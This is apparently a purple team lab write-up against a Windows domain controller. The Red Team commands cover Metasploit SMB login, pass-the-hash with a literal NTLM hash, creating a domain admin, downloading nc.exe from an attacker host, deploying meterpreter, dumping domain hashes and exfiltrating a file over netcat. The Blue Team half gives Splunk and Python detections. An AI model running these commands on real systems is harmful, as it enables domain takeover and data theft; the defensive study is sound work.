Purple Team Exercise: Professor
Since we don’t know the password, we’ll have to use the wordlist provided in the /root directory of Kif.
Red Team
nmap 192.168.0.254
nmap -sV -O -p 53,88,135,139,389,445,8089 192.168.0.254 --script=safe -oA nmap
msfconsole
search smb_login
use auxiliary/scanner/smb/smb_login
show options
set smbuser Administrator
set smbpass :aad3b435b51404eeaad3b435b51404ee:a6d00d6c85d3a477921688771dba6eaf
set rhosts 192.168.0.251-254
exploit
This only worked when Kali was local to the machine, not over VPN. Not sure why…
use exploit/windows/smb/psexec
Enter the same info to get a SYSTEM shell
Because of VPN we need to issue:
pth-winexe -U administrator%aad3b435b51404eeaad3b435b51404ee:a6d00d6c85d3a477921688771dba6eaf //192.168.0.254 cmd.exe
net user sqearl Password1 /ADD /DOMAIN
net group "Domain Admins" sqearl /ADD /DOMAIN
A coworker mentioned I could add sqearl to Enterprise Admins and would have the domain permissions necessary to later run the meterpreter post script. Thanks Ed!
Login to host via RDP
IEX(new-object System.Net.WebClient).DownloadFile('http://10.242.2.2:8000/nc.exe','C:\Users\sqearl\Desktop\nc.exe')
Wireshark / pcap did not pick up this nc.exe download over PowerShell
Windows, change to cmd: nc.exe -l -p 1234 > met64.exe
Kali: nc -w 3 192.168.0.254 1234 < met64.exe
use exploit/multi/handler
run
met64.exe
getuid
Exit this session, then execute met64.exe from the pth-winexe session:
ps
Migrate to an x64 SYSTEM process
Ctrl+Z backgrounds the meterpreter session
use post/windows/gather/credentials/domain_hashdump
set session 4
run
cd C:\Users\Administrator\Desktop
type sensitive_info
Kali:
nc -l -p 2345 > sensitive_info.txt (we need to disable the FW for this to work as well)
Windows:
C:\Users\sqearl\Desktop\nc.exe -w 3 10.242.2.2 2345 < sensitive_info.txt
Blue Team
Filter by Professor's IP:
Splunk search for snort SCAN alerts
earliest=05/13/2018:16:00:0 latest=05/13/2018:18:25:0 src_ip="10.242.2.2" dest_ip="192.168.0.254" sourcetype=sguild name=*SCAN* name!=*Dirbuster* name!=*Nikto* | sort 0 _time | table _time src_ip dest_ip name
SMB Alerts during our smb_login attempts
I used this article, but I wasn't able to log my pass-the-hash attacks. I must need to look again:
https://blog.binarydefense.com/reliably-detecting-pass-the-hash-through-event-log-analysis
Here’s the search that “should” detect PTH:
sourcetype="WinEventLog:Security" EventCode=4624 Logon_Type=3 Logon_Process=NtLmSsp Security_ID="NULL SID" Key_Length=0 Account_Name!="*$" AND Account_Name!="-" AND Account_Name!="ANONYMOUS LOGON"
We use the process command line field to detect the admin's commands:
host=professor Process_Command_Line=* Account_Name!=*$ Process_Command_Line!="*xff*" | table _time Account_Name Process_Command_Line status | sort +_time
Splunk Alert:
We should be alerting or at least reporting on these commands. If a domain user is added, maybe an alert.
host=professor Process_Command_Line="*/ADD /DOMAIN*"
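The two detections above (the 4624 pass-the-hash filter and the /ADD /DOMAIN command line rule) expressed as Python filters, as an added example that is not part of the original writeup; the sample events are constructed by me and shaped like Splunk's WinEventLog:Security fields, with the command lines assumed to come from 4688 process creation events.

```python
import re

# Constructed sample events (not real logs), shaped like the
# WinEventLog:Security fields used by the Splunk searches above.
SAMPLE_EVENTS = [
    {"EventCode": "4624", "Logon_Type": "3", "Logon_Process": "NtLmSsp",
     "Security_ID": "NULL SID", "Key_Length": "0", "Account_Name": "Administrator"},
    {"EventCode": "4624", "Logon_Type": "3", "Logon_Process": "NtLmSsp",
     "Security_ID": "NULL SID", "Key_Length": "0", "Account_Name": "PROFESSOR$"},
    {"EventCode": "4624", "Logon_Type": "3", "Logon_Process": "Kerberos",
     "Security_ID": "S-1-5-21-EXAMPLE-1104", "Key_Length": "0", "Account_Name": "sqearl"},
    {"EventCode": "4624", "Logon_Type": "3", "Logon_Process": "NtLmSsp",
     "Security_ID": "NULL SID", "Key_Length": "128", "Account_Name": "Administrator"},
    {"EventCode": "4688", "Account_Name": "Administrator",
     "Process_Command_Line": "net user sqearl Password1 /ADD /DOMAIN"},
    {"EventCode": "4688", "Account_Name": "PROFESSOR$",
     "Process_Command_Line": "C:\\Windows\\system32\\svchost.exe -k netsvcs"},
]

def is_pth_logon(ev):
    """Mirror of the 4624 search: NTLM network logon with NULL SID and
    Key_Length=0, excluding machine accounts, '-' and ANONYMOUS LOGON."""
    if ev.get("EventCode") != "4624" or ev.get("Logon_Type") != "3":
        return False
    if ev.get("Logon_Process") != "NtLmSsp" or ev.get("Security_ID") != "NULL SID":
        return False
    if ev.get("Key_Length") != "0":
        return False
    name = ev.get("Account_Name", "")
    return not (name.endswith("$") or name in ("-", "ANONYMOUS LOGON"))

# net user/group ... /ADD /DOMAIN in any case, anywhere in the command line
DOMAIN_ADD = re.compile(r"\bnet\s+(user|group)\b.*\s/ADD\b.*\s/DOMAIN\b", re.IGNORECASE)

def is_domain_add(ev):
    """Process creation event whose command line adds a domain user or group
    member; machine accounts are ignored as in the search above."""
    if ev.get("Account_Name", "").endswith("$"):
        return False
    return bool(DOMAIN_ADD.search(ev.get("Process_Command_Line", "")))

def triage(events):
    """Return (suspected PTH logons, domain add commands) for a list of events."""
    pth = [e for e in events if is_pth_logon(e)]
    adds = [e for e in events if is_domain_add(e)]
    return pth, adds

if __name__ == "__main__":
    pth, adds = triage(SAMPLE_EVENTS)
    print(f"{len(pth)} suspected PTH logon(s), {len(adds)} domain add command(s)")
```

Only the first sample logon and the net user command should be flagged; the machine account, the Kerberos logon and the Key_Length=128 logon fall through the exclusions.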
OSSEC typically alerts on newly created users and first-time logins… For some reason, I don't see these alerts.
netcat connecting to our Kali IP:
host=professor Process_Command_Line=* Account_Name!=*$ Process_Command_Line!="*xff*" | table _time Account_Name Process_Command_Line status | sort +_time
We do not have any insight into the meterpreter commands:
host=professor Process_Command_Line=* Account_Name!=*$ Process_Command_Line!="*xff*" | table _time Account_Name Process_Command_Line status | sort +_time
We aren’t able to intercept this file because it was sent via netcat
I should have logs for this command, but everything run prior to this in meterpreter goes undetected 🙁